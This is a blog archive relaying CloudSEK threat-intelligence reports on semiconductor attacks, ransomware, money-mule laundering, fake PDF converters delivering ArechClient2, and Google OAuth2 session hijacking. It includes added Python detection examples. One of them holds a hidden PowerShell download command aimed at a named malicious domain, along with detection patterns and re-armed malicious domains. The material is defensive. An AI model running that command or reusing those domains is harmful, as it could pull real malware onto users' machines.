Archive for CloudSEK

Six-Fold Surge in Cyberattacks and $1B in Ransomware Losses Are Reshaping the Global Semiconductor Industry

Posted in Commentary with tags on August 12, 2025 by itnerd

CloudSEK’s latest threat intelligence report, Silicon Under Siege: The Cyber War Reshaping the Global Semiconductor Industry, uncovers a rapidly escalating cyber threat landscape targeting the semiconductor sector – the digital backbone of modern civilization.

Powering everything from AI and defence systems to smartphones, clean energy, and healthcare, semiconductors have become both a strategic asset and a prime cyber target. The research reveals that nation-state-backed groups, ransomware operators, and hacktivists are waging a silent but highly coordinated cyber war — one that threatens economies, disrupts global supply chains, and risks the very foundation of critical infrastructure.

CloudSEK’s proof-of-concept showed how AI can be harnessed to design and embed hardware Trojans at the pre-design stage of a chip. Even a simple AI-generated implant can evade detection and, once manufactured, lie dormant for years until triggered – leaking sensitive data, falsifying outputs, or halting operations. More advanced AI-driven designs could tailor Trojans to bypass specific security checks, adapt to different architectures, and remain invisible across multiple verification stages, making them potent tools for espionage or sabotage in the semiconductor supply chain.

Key Findings from the CloudSEK Report

  • Attack volume up sixfold since 2022 — Driven by espionage, supply-chain compromises, and state-sponsored campaigns.
  • $1.05 billion in ransomware-related losses since 2018 — Including ransom payments, downtime, and recovery costs, crippling semiconductor operations worldwide.
  • IT as initial attack vector — Over 60% of ICS breaches begin with IT (phishing, VPN exploits, CVEs, exposed interfaces and misconfigurations, default or leaked/compromised credentials, etc.) before pivoting to OT.
  • Massive infrastructure exposure — The U.S. alone has ~2 million publicly reachable ICS assets linked to semiconductor operations, many potentially with weak or default controls.
  • Massive Middle East ICS exposure — Across the Middle East, publicly reachable ICS & OT assets tied to semiconductor-linked manufacturing and potentially critical oil, gas, and industrial operations remain exposed: UAE (~12.1K), Turkey (~10.8K), Saudi Arabia (~4.8K), Iran (~4.6K), Bahrain (~2.4K), and Qatar (~400), with potential vulnerabilities stemming from weak authentication, misconfigurations, and outdated protocols.
  • High-value espionage incidents — In July 2025, China-backed APT41 infiltrated multiple Taiwanese semiconductor companies via a compromised software update, stealing proprietary chip designs and process data.
  • Pre-silicon hardware Trojans — CloudSEK’s proof-of-concept AI-generated Trojan can remain dormant until triggered, leaking cryptographic keys while evading standard tests.
  • Single vendor compromise cascading into global disruption — The 2023 MKS Instruments ransomware breach caused an estimated $250M in losses to Applied Materials in one quarter.

Geopolitics and the “Silicon Cold War”

The semiconductor race has become a strategic flashpoint in the global balance of power, with cyber espionage campaigns, supply chain intrusions, and state-backed sabotage now central to the contest:

  • China — investing $150+ billion to achieve chip self-sufficiency and reduce reliance on Western tech.
  • U.S. — committed $52 billion via the CHIPS Act to reshore manufacturing and secure supply chains.
  • India — investing $10 billion in its semiconductor mission, aiming for a $100 billion market by 2030.
  • Taiwan — produces over 60% of the world’s advanced chips, making it a critical node in the global tech ecosystem.
  • Europe — facing converging geopolitical and infrastructure risks, as exemplified by a SCADA compromise of a Ukrainian power substation during the Russia–Ukraine conflict that used OT-aware malware to issue malicious control commands.

State-sponsored Advanced Persistent Threats (APTs) such as APT41, Volt Typhoon and PlushDaemon are embedding themselves in software pipelines, EDA tools, and factory operations, shifting from mere data theft to long-term disruption strategies that can cripple production during geopolitical flashpoints.

Notable Campaigns and Case Studies

Historic Incidents

The semiconductor industry’s cyber risk is not new. Landmark events such as the 2010 Stuxnet sabotage of Iran’s Natanz facility, the 2018 TSMC WannaCry infection that halted iPhone chip production, and other high-profile attacks have long demonstrated the destructive potential of cyber threats to semiconductor-driven critical infrastructure.

Real-World Incidents Highlighting IT–OT Interdependencies

  • Aliquippa Water Authority Breach (Nov 2023) — Default HMI credentials exposed Unitronics PLCs, demonstrating how simple IT misconfigurations can compromise industrial controls.
  • UNC5221 VPN Exploitation (2025) — State-affiliated actors exploited CVE-2025-22457 in ICS VPN appliances to pivot into OT networks, spotlighting VPNs as critical OT entry points.
  • Infostealer Malware Targeting Defense Contractors (Feb 2025) — Commodity stealers harvested credentials that could be used to access corporate VPNs and OT management interfaces.
  • Medusa Ransomware Campaigns (2021–2025) — Active RaaS operations targeting legacy ICS/SCADA systems in manufacturing and supply chains, often combining encryption with IP extortion.
  • Microchip Technology Breach (Aug 2024) — IT system compromise disrupted multiple facilities, causing ~$21M in losses and halting connected OT functions.

Emerging Threat Patterns Identified by CloudSEK

  • Supply Chain Attacks — Targeting trusted vendors, software updates, and outsourced design services.
  • Pre-silicon Design Compromise — Embedding hardware Trojans directly into chip designs during the design phase, remaining dormant and undetectable until after manufacturing.
  • IT–OT Convergence Risks — Misconfigured SCADA dashboards, HMIs, and cleanroom controllers now searchable online, enabling attackers to “log in” rather than hack in.
  • Ransomware with IP Extortion — Exfiltrating proprietary designs to pressure payments from both chipmakers and dependent industries.

CloudSEK’s Strategic Recommendations for the Semiconductor Sector

  1. Isolate IT and OT Networks — Prevent lateral movement between corporate IT and manufacturing systems.
  2. Secure-by-Design Practices — Implement RTL integrity checks, formal logic verification, and traceable SBOMs for third-party IP.
  3. Continuous Attack Surface Monitoring — Detect exposed assets, leaked credentials, and unpatched CVEs before attackers exploit them.
  4. Vendor Risk Management — Enforce stringent security requirements for all suppliers and third-party service providers.
  5. Global Threat Intelligence Sharing — Collaborate across borders to detect and neutralize state-sponsored campaigns before they escalate.

CloudSEK’s BeVigil and XVigil platforms deliver real-time visibility into exposed IT/OT assets on the Internet, map vulnerable vendor ecosystems, and track emerging threat actor infrastructure, enabling chipmakers and suppliers to act before vulnerabilities become permanent features of the global tech landscape.

Full report available here: https://www.cloudsek.com/whitepapers-reports/silicon-under-siege-the-cyber-war-reshaping-the-global-semiconductor-industry  

CloudSEK Uncovers New Epsilon Red Ransomware

Posted in Commentary with tags on July 25, 2025 by itnerd

CloudSEK’s latest threat intelligence report reveals a sophisticated ransomware campaign leveraging fake ClickFix-themed verification pages to distribute Epsilon Red malware.

Threat actors are impersonating platforms like Discord, Twitch, and OnlyFans to trick users into downloading .HTA files. These payloads silently execute ransomware via browser-based ActiveX abuse—bypassing standard security measures and putting global users at risk.

Key Highlights:

  • Active campaign observed in July 2025
  • Abuse of social engineering and brand impersonation
  • Infrastructure linked to multiple fake domains and IPs
  • Epsilon Red ransom notes bear stylistic resemblance to REvil, though the malware is distinct
  • Final-stage deployment of Epsilon Red ransomware

Full report available here: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware

Guest Post: Uncovering Chinese Dark Web Syndicates and Money Mule Pipeline to Indian Banks

Posted in Commentary with tags on July 16, 2025 by itnerd

CloudSEK has released a groundbreaking whitepaper uncovering a sophisticated network of Chinese-operated illegal payment gateways exploiting India’s digital banking infrastructure. 

The report, titled Chinese-Operated Illegal Payment Gateways Exploiting & Laundering in the Indian Financial Network, reveals how transnational criminal syndicates are orchestrating a multi-billion-dollar shadow economy, laundering funds through illicit gateways that facilitate illegal gambling, Ponzi schemes, predatory lending, and digital fraud.

A Parallel Financial Ecosystem Threatening India’s Economy

India’s rapid digital transformation, powered by the Unified Payments Interface (UPI), has revolutionized financial access but also created vulnerabilities. CloudSEK’s research exposes how Chinese-led syndicates are exploiting these gaps, operating illegal payment gateways that bypass Reserve Bank of India (RBI) regulations. 

These gateways serve as the financial backbone for illicit operations, facilitating the movement of tainted money through a web of “mule” bank accounts to obscure its origins before exfiltrating it via cryptocurrency or hawala networks. (For More Information, Download Full Report)

Key findings include:

  • Massive Scale of Operations: A single fraudulent app analyzed by CloudSEK facilitated ₹166 crore in transactions across 398,675 transactions, involving 34,299 unique mule accounts in just 12 months. Extrapolating to an estimated 25 similar apps, the total laundered amount could reach ₹4,000–5,000 crore annually, with a daily volume of ₹10–15 crore.
  • Sophisticated Mule Recruitment: Criminals target vulnerable Indians—unemployed youth, students, and rural communities—through fraudulent apps, face-to-face agents, and “work-from-home” OTP-sharing scams to harvest bank accounts. These accounts are then integrated into advanced dashboards for large-scale money laundering.
  • Global Reach, Local Impact: 40+ countries involved in the illegal payment gateway network. The syndicates operate from Southeast Asia and the Mekong region, using mule accounts from India, Pakistan, Bangladesh, and beyond. Funds are laundered through dynamic UPI IDs, cryptocurrency (primarily USDT-Tether), and fake international trade, draining India’s economy and evading taxes.
  • Diverse Illicit Clients: The gateways serve illegal gambling platforms (e.g., Aviator crash games), Ponzi schemes, predatory lending apps, fake stock trading platforms, and digital arrest scams, charging transaction fees of 3–10% based on the risk level of the funds.
  • Tech-Enabled Deception: Over 100 Telegram channels promote these gateways, while YouTube tutorials with 37,200+ views guide fraudsters on integrating APIs. Shell companies pose as legitimate fintechs, using paid ads on Google, Facebook, and Instagram to whitewash their operations. (For More Information, Download Full Report)

Three-Tier Exploitation Model Uncovered

CloudSEK’s research identified three distinct categories of illegal payment gateway clients, each charged different fees based on risk levels:

  1. Gaming & Gambling Platforms (5% deposit, 3% withdrawal fees) – Including illegal casinos and betting apps like crash games
  2. Ponzi & Investment Schemes (7-8% deposit, 4-5% withdrawal fees) – Fake investment platforms promising unrealistic returns
  3. Mixed Scam Operations (10% deposit, 10% withdrawal fees) – Multi-source fraud including loan scams and crypto doubling schemes

The syndicates employ multiple recruitment strategies to acquire Indian bank accounts, including fraudulent mobile applications that request banking credentials and intercept OTP messages, face-to-face agents who target vulnerable populations with cash payments, and “work-from-home” schemes where individuals unknowingly serve as human OTP relays.

Technical Sophistication Rivals Legitimate Services

The illegal gateways operate with remarkable technical sophistication, featuring dynamic UPI infrastructure that generates unique QR codes for each transaction, full API integration allowing automated fund collection, global wallet access enabling multi-currency transactions, and comprehensive monitoring dashboards for real-time transaction management.

Once funds are collected, they undergo a complex layering process across 7-10 different mule accounts within minutes, making detection and tracing extremely difficult. The final stage involves exfiltrating laundered funds from India through cryptocurrency purchases, traditional hawala networks, or trade-based money laundering schemes.
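The rapid layering described above (a credit forwarded on within minutes, minus the gateway's cut, through a string of accounts) is exactly the kind of pattern the report's recommendation for banks, "deploy monitoring to detect mule account patterns", refers to. The following is an added example, not code from CloudSEK or the report: it runs a simple pass-through-chain detector over a constructed ledger. The time window, the minimum forwarded ratio and the minimum chain length are assumed tuning parameters, not figures from the report.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ledger (not data from the CloudSEK report): one deposit
# passed through four mule accounts within minutes, plus ordinary activity
# (a salary credit spent two days later) that must not trigger an alert.
TRANSACTIONS = [
    ("2025-06-01T10:00:00", "payer_1",     "mule_a",      50000),
    ("2025-06-01T10:03:00", "mule_a",      "mule_b",      49500),
    ("2025-06-01T10:05:00", "mule_b",      "mule_c",      49000),
    ("2025-06-01T10:09:00", "mule_c",      "mule_d",      48500),
    ("2025-06-01T10:12:00", "mule_d",      "exchange_x",  48000),
    ("2025-06-01T11:00:00", "employer",    "salary_acct", 45000),
    ("2025-06-03T09:00:00", "salary_acct", "landlord",    20000),
]


def parse(rows):
    """Turn (iso_timestamp, sender, receiver, amount) rows into time-sorted tuples."""
    return sorted((datetime.fromisoformat(ts), src, dst, amt) for ts, src, dst, amt in rows)


def find_layering_chains(rows, window_minutes=15, min_ratio=0.9, min_hops=3):
    """Return pass-through chains: each credit is forwarded by the receiving account
    within `window_minutes`, keeping at least `min_ratio` of the amount (the rest
    being the gateway's cut). Chains shorter than `min_hops` transfers are ignored.
    All three thresholds are assumed values for this example."""
    txs = parse(rows)
    outgoing = defaultdict(list)          # sender -> its transfers, time-ordered
    for tx in txs:
        outgoing[tx[1]].append(tx)
    window = timedelta(minutes=window_minutes)

    def next_hop(tx):
        ts, _, dst, amt = tx
        for cand in outgoing[dst]:
            if ts < cand[0] <= ts + window and min_ratio * amt <= cand[3] <= amt:
                return cand
        return None

    chains, seen = [], set()
    for tx in txs:
        if tx in seen:
            continue                       # already absorbed into an earlier chain
        chain = [tx]
        while (nxt := next_hop(chain[-1])) is not None and nxt not in seen:
            chain.append(nxt)
        seen.update(chain)
        if len(chain) >= min_hops:
            chains.append({
                "path": [chain[0][1]] + [t[2] for t in chain],
                "hops": len(chain),
                "minutes": (chain[-1][0] - chain[0][0]).total_seconds() / 60,
                "amount_in": chain[0][3],
                "amount_out": chain[-1][3],
            })
    return chains


if __name__ == "__main__":
    for c in find_layering_chains(TRANSACTIONS):
        print(f"{c['hops']} hops in {c['minutes']:.0f} min: {' -> '.join(c['path'])} "
              f"({c['amount_in']} in, {c['amount_out']} out)")
```

The detector follows each credit forward greedily, so a single slow or small hop breaks the chain; in production the same walk would be run over a graph of all accounts with fan-in and fan-out counts added, since the report describes one collection account feeding many mules rather than a single straight line.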

Real-World Consequences for India

The implications of these findings are profound:

  • Economic Drain: The shadow economy siphons billions of rupees annually, weakening the Indian Rupee and depriving the government of tax revenue.
  • Financial System Integrity: The volume of fraudulent transactions overwhelms bank fraud detection systems, eroding public trust in digital payments.
  • Social Harm: Indian citizens are doubly victimized—first as targets of scams and then as unwitting money mules facing frozen accounts or legal repercussions.
  • National Security Risks: The infrastructure could fund activities against India’s interests, while massive data collection by fraudulent apps poses espionage risks.

Law enforcement actions validate CloudSEK’s findings: 

  • Hyderabad Police (2022): Uncovered ₹700+ crore money laundering operation with Chinese nationals operating from Dubai
  • Enforcement Directorate (2022-2023): Froze hundreds of crores across multiple investigations into predatory loan and gambling apps
  • Odisha EOW (2023): Revealed over 1,000 mule accounts used to launder ₹1,000+ crore from cyber-scams

The shadow banking system poses significant threats to India’s economic sovereignty, financial system integrity, and national security while victimizing countless citizens who become unwitting money mules.

We have already reported a total of ~47,000 mule accounts to both Public and Private sector banks since we began extracting and analyzing data from illicit mobile applications. These accounts collectively represent a transaction volume of around ₹250 crore. (For More Information, Download Full Report)

A Call to Action

CloudSEK urges immediate, coordinated action to dismantle these networks:

  • Banks and Fintechs: Deploy AI-powered monitoring to detect mule account patterns and strengthen KYC for corporate accounts.
  • Regulators: Enforce stricter fintech oversight and issue clear guidelines on mule account liability.
  • Law Enforcement: Build specialized cyber-financial crime units and pursue international cooperation to target syndicate leaders.
  • Tech Platforms: Enhance app vetting on Google and Apple stores to block fraudulent apps.
  • Public Awareness: Launch nationwide campaigns to educate citizens about the risks of sharing OTPs or “renting” bank accounts, emphasizing that acting as a money mule is a serious crime.

CloudSEK’s Commitment to Cybersecurity

“These illegal payment gateways are not just financial crimes; they’re a direct attack on India’s digital economy and citizen trust. Our research arms stakeholders with actionable intelligence to disrupt these networks and protect India’s financial sovereignty,” said Mayank Sahariya, Cyber Threat Analyst at CloudSEK.

“Financial institutions, regulators, and law enforcement agencies must move beyond reactive measures to proactive, intelligence-driven strategies. The window for action is narrowing as these networks continue to expand and sophisticate their operations,” Mayank Sahariya added.

CloudSEK continues to monitor these criminal networks and provide actionable intelligence to help financial institutions, regulators, and law enforcement agencies protect India’s digital economy and financial sovereignty.

CloudSEK Raises $19 Million in Series B1 Funding to Scale Predictive Cybersecurity Platform

Posted in Commentary with tags on May 20, 2025 by itnerd

CloudSEK has raised $19 million across its Series A2 and B1 funding rounds. The round included participation from a mix of India- and US-based investors, such as MassMutual Ventures, Inflexor Ventures, Prana Ventures, Tenacity Ventures, and select strategic investors, including Commvault. Notably, Meeran Family (founders of Eastern Group), StartupXSeed, Neon Fund and Exfinity Ventures are among CloudSEK’s earlier backers and continue to support the company’s long-term vision.

Founded in 2015 by cybersecurity researcher-turned-entrepreneur Rahul Sasi, CloudSEK was created with a mission to build a safer digital future by proactively predicting and mitigating cyber threats. What began as a research-driven initiative has since evolved into one of the industry’s most trusted threat intelligence platforms—serving 250+ enterprises across banking, healthcare, technology, and the public sector.

The newly raised capital will fuel CloudSEK’s continued product innovation and global expansion, with a focus on advancing its AI models and platform integrations. Unlike traditional tools that respond after an incident, CloudSEK identifies Initial Attack Vectors (IAVs)—the earliest signs of a potential breach, such as leaked credentials, exposed APIs, or compromised vendors.

CloudSEK’s differentiated approach has resonated globally, earning the company a 4.8-star rating on Gartner Peer Insights across 195 reviews, making it one of the most recommended vendors in the cybersecurity space.

With this funding and a strategic investor on board, CloudSEK is doubling down on its vision to make predictive threat intelligence a global cybersecurity standard, empowering organizations to stay ahead of increasingly sophisticated threat actors.

Guest Post: Fake PDF Converters Used to Deploy ArechClient2 Malware Warns CloudSEK

Posted in Commentary with tags on April 15, 2025 by itnerd

CloudSEK’s security researchers have uncovered a sophisticated malware campaign using fake PDF-to-DOCX conversion tools to infect unsuspecting users with a powerful information stealer. This comes just weeks after the FBI’s Denver office issued a public alert warning of malicious online file converters being leveraged to deliver malware.

The report reveals how cybercriminals have crafted deceptive websites, such as candyxpdf[.]com and candyconverterpdf[.]com, that meticulously mimic the legitimate pdfcandy.com service. 

These fraudulent platforms lure users into executing a malicious PowerShell command, initiating a complex infection chain that delivers malware capable of stealing sensitive data, including browser credentials, cryptocurrency wallets, and other personal information. 

A Sophisticated Blend of Deception and Technology

The campaign employs advanced social engineering to exploit users’ trust. Victims uploading a PDF for conversion encounter a fake processing animation, followed by an unexpected CAPTCHA prompt designed to enhance the site’s perceived legitimacy and rush users into action. This leads to instructions to run a PowerShell command, which triggers a redirection chain through domains like bind-new-connect[.]click, ultimately delivering a malicious “adobe.zip” payload. The archive contains “audiobit[.]exe,” which leverages legitimate Windows tools like MSBuild[.]exe to deploy Arechclient2. (Read Full Report, For More Information)

“This campaign highlights how cybercriminals exploit everyday digital tools. By combining psychological manipulation with technical sophistication, these attackers turn routine tasks like file conversion into opportunities for data theft. Our research aims to equip individuals and organizations with the knowledge to stay safe,” said Varun Ajmera, Threat Intelligence Researcher, CloudSEK.

The scale of this threat becomes clear when considering the popularity of the legitimate PDFCandy.com, which attracts approximately 2.8 million monthly visits. Notably, India represents the largest segment of its user base, accounting for 19.07% or roughly 533,960 monthly visitors. This substantial audience provides a vast pool of potential victims for the threat actors behind this malicious campaign. While the fraudulent sites, candyxpdf[.]com and candyconverterpdf[.]com, saw approximately 2,300 and 4,100 visits respectively in March 2025, these numbers demonstrate active exploitation of the impersonated service’s popularity.

How the Attack Works

  • Spoofed Websites: Domains like candyxpdf[.]com and candyconverterpdf[.]com imitate the real PDFCandy website.
  • Deceptive Flow: Fake file conversion followed by a CAPTCHA prompt creates trust and urgency.
  • Malware Trigger: Users are prompted to run a PowerShell command, leading to the download of a malicious ZIP file masquerading as a legitimate Adobe resource.
  • Payload Execution: The ZIP contains audiobit.exe, which executes via MSBuild.exe – a legitimate Windows utility weaponized to run ArechClient2. (Read Full Report, For More Information)

CloudSEK’s technical analysis traced the malware delivery chain through multiple redirections, eventually landing on a known malicious domain (bind-new-connect[.]click) to deliver the payload. The attacker’s infrastructure, command chain, and payload hashes are included in the full report.
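The chain summarised above gives a defender three observable points: a DNS lookup for one of the domains named in the report, a PowerShell command that downloads and hides its window, and MSBuild.exe being launched by something other than a build tool, from a user-writable directory. The following is an added example, not code from CloudSEK or the report: it applies those three checks to constructed process-creation and DNS events. The domain list is taken from the report summary above (defanged there, re-armed here for matching); the allowlist of legitimate MSBuild parents and the list of script hosts are assumptions for the example.

```python
import re
from pathlib import PureWindowsPath

# Domains named in the report summary above (candyxpdf, candyconverterpdf, bind-new-connect)
REPORT_DOMAINS = {"candyxpdf.com", "candyconverterpdf.com", "bind-new-connect.click"}
# Assumed allowlist: parents that legitimately spawn MSBuild.exe on a developer box
BUILD_PARENTS_OK = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe"}
# Assumed list of script/interpreter hosts that should not be launching binaries from temp dirs
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(downloads|appdata\\local\\temp)(\\|$)", re.I)
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|invoke-webrequest|\biwr\b"
    r"|downloadstring|downloadfile|start-bitstransfer)", re.I)

# Constructed sample telemetry (not from the report): the infection chain on ws01,
# followed by benign activity on dev02 that must stay silent.
EVENTS = [
    {"type": "process", "host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://bind-new-connect.click/adobe.zip -OutFile $env:TEMP\adobe.zip"'},
    {"type": "dns", "host": "ws01", "qname": "bind-new-connect.click."},
    {"type": "process", "host": "ws01",
     "image": r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "audiobit.exe"},
    {"type": "process", "host": "ws01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe",
     "cmdline": "MSBuild.exe project.xml"},
    {"type": "process", "host": "dev02",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe",
     "cmdline": "MSBuild.exe app.csproj"},
    {"type": "dns", "host": "dev02", "qname": "pdfcandy.com"},
    {"type": "process", "host": "dev02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -c Get-Date"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def check_process(ev):
    """Return (rule, severity, detail) for a suspicious process-creation event, else None."""
    img, parent, cmd = ev["image"], ev["parent"], ev.get("cmdline", "")
    img_b, par_b = basename(img), basename(parent)
    # MSBuild spawned by a non-build parent; worse if that parent lives in a user-writable path
    if img_b == "msbuild.exe" and par_b not in BUILD_PARENTS_OK:
        sev = "high" if USER_WRITABLE.search(parent) else "medium"
        return ("msbuild_unexpected_parent", sev, f"{par_b} -> msbuild.exe")
    # PowerShell that downloads content or hides its window
    if img_b in {"powershell.exe", "pwsh.exe"} and PS_SUSPICIOUS.search(cmd):
        return ("powershell_download_or_hidden", "medium", cmd[:80])
    # A binary in Downloads/Temp launched by a script host
    if USER_WRITABLE.search(img) and par_b in SCRIPT_HOSTS:
        return ("exe_from_user_dir_via_script_host", "high", f"{par_b} -> {img_b}")
    return None


def check_dns(ev):
    """Flag lookups of the report's domains or any subdomain of them."""
    q = ev["qname"].lower().rstrip(".")
    if q in REPORT_DOMAINS or any(q.endswith("." + d) for d in REPORT_DOMAINS):
        return ("known_report_domain", "high", q)
    return None


def scan(events):
    findings = []
    for ev in events:
        hit = check_process(ev) if ev["type"] == "process" else check_dns(ev)
        if hit:
            findings.append({"host": ev["host"], "rule": hit[0], "severity": hit[1], "detail": hit[2]})
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['rule']}: {f['detail']}")
```

The MSBuild rule is the most durable of the three: domains rotate and the PowerShell text changes, but a build tool started by a binary out of a temp directory is rare on any host that is not a build server, which is why the example grades it highest.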

Wider Implications

This campaign demonstrates a growing trend where attackers prey on routine digital activities—like file conversion—to compromise systems. Given the increasing use of online converters in corporate and personal workflows, this type of attack has wide-ranging implications for cybersecurity hygiene.

Protecting Against the Threat

CloudSEK’s report provides actionable recommendations to safeguard individuals and organizations:

  • Stick to Trusted Tools: Use reputable file conversion services from official websites and avoid unverified “free” converters.
  • Strengthen Technical Defenses: Keep antivirus software updated, deploy endpoint detection and response (EDR) solutions, and use DNS filtering to block malicious domains.
  • Educate Users: Train employees to recognize red flags, such as suspicious URLs, unexpected CAPTCHAs, or prompts to run command-line instructions.
  • Incident Response: Isolate compromised devices, change passwords from a clean device, and report incidents to authorities promptly.
  • Offline Alternatives: Consider offline conversion tools to avoid uploading sensitive files to remote servers.


A Call to Vigilance

As online file converters remain a staple in digital workflows, this campaign underscores the need for heightened awareness. “As threat actors become more creative with their tactics, cybersecurity must evolve to prioritize behavior-based detection, user awareness, and zero-trust principles. Organizations should invest in robust endpoint security, DNS filtering, and employee training. Most importantly, we need to reduce reliance on unknown web-based tools and encourage the use of secure, offline alternatives for tasks like file conversion,” said Varun Ajmera, Threat Intelligence Researcher, CloudSEK.

About CloudSEK: CloudSEK is a contextual AI company that predicts Cyber Threats. Our Cloud SaaS platform constantly seeks security solutions for our customers’ digital risks.
To learn more about how CloudSEK can strengthen your external security posture and deliver value from Day One, visit https://cloudsek.com or drop a note to info@cloudsek.com. 

Google OAuth2 Abused To Regenerate Tokens For Persistent Session Access

Posted in Commentary with tags on January 4, 2024 by itnerd

Attackers are exploiting undocumented Google OAuth2 functionality to hijack user sessions. The approach gives them continuous access to Google services, even after a password reset.

Researcher Pavan Karthick M at CloudSEK has detailed how the threat actor called “Prisma” was the first to use a critical OAuth exploit which “allows the generation of persistent Google cookies through token manipulation.”

OAuth 2.0 is a protocol utilized by Google APIs for authentication and authorization, such as enabling “Log in with Google” across the web. It allows users to grant specific data access to applications while safeguarding sensitive information like passwords.

The exploit has two key features:

  • Session Persistence: The session remains valid even when the account password is changed, providing a unique advantage in bypassing typical security measures.
  • Cookie Generation: The capability to generate valid cookies in the event of a session disruption enhances the attacker’s ability to maintain unauthorized access.

2023 adoption timeline:

Oct 20: The exploit is first revealed on a Telegram channel.
Nov 14: Lumma announces the feature’s integration with an advanced blackboxing approach; adoption accelerated after the security community publicized Lumma’s unique feature.
Nov 17: Rhadamanthys announces the feature with a similar blackboxing approach to Lumma’s.
Nov 24: Lumma updates the exploit to counteract Google’s fraud detection measures.
Dec 1: Stealc implements the Google account token restore feature.
Dec 11: Meduza implements the Google account token restore feature.
Dec 12: RisePro implements the Google account token restore feature.
Dec 26: WhiteSnake implements the Google account token restore feature.
Dec 27: Hudson Rock posts a video from the dark web in which a hacker demonstrates use of the generated cookies.

“This analysis… highlights the necessity for continuous monitoring of both technical vulnerabilities and human intelligence sources to stay ahead of emerging cyber threats. The collaboration of technical and human intelligence is crucial in uncovering and understanding sophisticated exploits like the one analyzed in this report,” Karthick M concludes.

Troy Batterberry, CEO and Founder, EchoMark had this to say:

   “As we navigate the evolving landscape of cybersecurity, the sophistication of threat actors is on the rise, leading to a potential surge in zero-day exploits in 2024. Lumma’s recent assault is a poignant example. The adept concealment of their proprietary attack mechanism and exploit methodologies, coupled with their ability to circumvent detection and sustain persistent access despite routine security measures, underscores the imperative for individuals and businesses alike to heed this wake-up call. Organizations operate on trust and secure data sharing and must prioritize proactive security measures and continuous monitoring to effectively combat the ever-emerging challenges posed by cyber threats.”

This proves that everyone needs to work hard just to stay level with threat actors, because threat actors are always looking for new angles from which to launch new attacks, and it will end badly for all of us if they succeed.